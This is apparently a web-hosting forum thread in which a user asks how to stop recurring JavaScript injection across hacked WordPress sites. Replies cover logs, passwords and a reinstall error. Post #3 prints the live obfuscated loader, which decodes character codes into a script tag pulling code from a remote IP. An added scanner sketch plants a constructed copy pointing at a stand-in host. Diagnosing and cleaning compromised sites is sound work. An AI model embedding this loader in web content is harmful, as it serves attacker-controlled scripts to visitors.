Sites hacked


#1

all our websites under our main user have been hacked.
i was really shocked when dreamhost support say they can’t help!

so … i have no idea how this happened and very little idea how to stop it.

i’ve found the code that’s being inserted (javascript) and removed it, but it keeps coming back.

how do i find how/where/what is putting it there so i can get rid of it once and for all?

really hope someone can help!


#2

Since you gave us no idea what’s actually on your site, start with the basics:

Restore from known good backups
Change all passwords
Make sure all of your software is patched

It’s not a shock that Support won’t help. Their servers are secure; it’s users’ sites that aren’t secure and it’s up to the users to secure their own sites.

-Scott


#3

i’ve done all that!
but there’s obviously something still there that i can’t find that’s putting the code back on my sites :frowning:
please can anyone give me any ideas where to start looking?

this is the javascript:

var s="",i,c=0,o="";
var str="60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|";
l=str.length;
for(c=0;c<=str.length-1;c++){
while(str.charAt(c)!='|')s=s+str.charAt(c++);
o=o+String.fromCharCode(s);
s="";}
document.write(o);

and yes it was a shock to me that dreamhost support weren’t prepared to help.


#4

You still haven’t provided any additional information regarding what’s installed at your site.

To dig deeper, look through your Apache logs in /logs/YOURDOMAIN/httpd for entries at about the time your site was hacked.

-Scott
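
An added example, not written by anyone in this thread: a Python sketch that walks a site directory, finds files carrying the pipe-delimited character-code loader posted in #3, decodes the payload statically, and returns each file's modification time so it can be matched against the Apache log entries mentioned in #4. The function names, the extension list and the demo tree (which uses a constructed payload pointing at example.invalid) are assumptions made for illustration.

```python
import os
import re
import tempfile
import time

# Quoted run of decimal character codes separated by "|", as in the posted script.
PAYLOAD_RE = re.compile(r'["\']((?:\d{1,3}\|){10,})["\']')
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js", ".inc", ".tpl")  # assumed list

def decode_payload(encoded):
    """Decode '60|115|...|' to text statically, without running the script."""
    return "".join(chr(int(code)) for code in encoded.split("|") if code)

def scan_tree(root):
    """Return (mtime, path, decoded markup) for every file carrying the loader."""
    hits = []
    for folder, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(folder, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as handle:
                    text = handle.read()
            except OSError:
                continue  # unreadable file, skip it
            if "fromCharCode" not in text:
                continue  # no decoder loop, so not this injection
            for match in PAYLOAD_RE.finditer(text):
                hits.append((os.path.getmtime(path), path,
                             decode_payload(match.group(1))))
    return sorted(hits)  # oldest modification first

def build_demo_tree():
    """Constructed sample tree: one clean file, one with a constructed injection."""
    root = tempfile.mkdtemp()
    tag = '<script src="http://example.invalid/stat.js"></script>'
    encoded = "|".join(str(ord(ch)) for ch in tag) + "|"
    with open(os.path.join(root, "about.html"), "w") as handle:
        handle.write("<html><body>clean page</body></html>\n")
    with open(os.path.join(root, "index.php"), "w") as handle:
        handle.write('<?php echo "hi"; ?>\n<script>var str="%s";\n'
                     "o=o+String.fromCharCode(s);document.write(o);</script>\n" % encoded)
    return root

if __name__ == "__main__":
    for mtime, path, decoded in scan_tree(build_demo_tree()):
        print(time.ctime(mtime), path, decoded)
```

Pointing `scan_tree` at the account's home directory instead of the demo tree lists every affected file across all sites under that user; a file whose timestamp changes again after cleaning marks the time window to search in the logs.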


#5

What kind of websites are you running?

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#6

Do you have wordpress installed?


#7

yes and i suspect that’s where they got in. i’ve re-installed wordpress and made sure it’s completely up to date, but i’m still having problems.

i’m also in the process of moving all the sites (once cleaned) into different user accounts so at least if it happens again then only one site can be attacked (i hope!)


#8

ok, an update, and sorry if i sound dumb - i don’t know much outside of html and seo!

i’m just trying to reinstall wordpress onto an existing domain (that used to run wordpress but i have deleted it). i’ve also created a new mysql database (so it’s not the one the site/wordpress used to use).

but i am getting this error “You appear to have already installed WordPress. To reinstall please clear your old database tables first”

i’ve tried this twice and checked and double-checked but the database is empty.

is it possible that the information_schema has been affected by the hack (i’m using the same mysql hostname)?

if so, what do i do?


#9
  1. Goodies -> One Click Installs. See if the previous installation is listed under Modify/Delete existing software (in both Easy and Advanced sections). If so, then delete it.

  2. Use phpMySQL to log into the database and Drop all tables. Or delete the database in the Goodies -> Manage MySQL section. Or create a new database. And use/change new passwords!

  3. One-Click a new WordPress installation (with a new username and password). And stay away from sketchy plugins. Were you using any additional plugins last time?

Good idea. They could be exploiting one of your other sites to get into your home directory.
-Scott


#10

thanks but i’ve already done all that. even created a new database hostname!

looking at wp-config.php the only thing i can see that might be wrong is:
$table_prefix = 'wp_h6od3i_';

?


#11

Table prefix is pretty random, so that’s not a problem.

So if you’ve already done all that, then you should be fine.

-Scott


#12

but i’m still getting the error message
"You appear to have already installed WordPress. To reinstall please clear your old database tables first."


#13

Check the tables using phpMyAdmin.



#14

done that - there are no tables!


#15

Change: $table_prefix = 'wp_h6od3x_';



#16

already tried that. no joy :frowning:


#17

How did you install WP this time around?

Have you checked the installation files via SFTP?



#18

i’ve tried one-click install and uploading via sftp.
both result in same error message.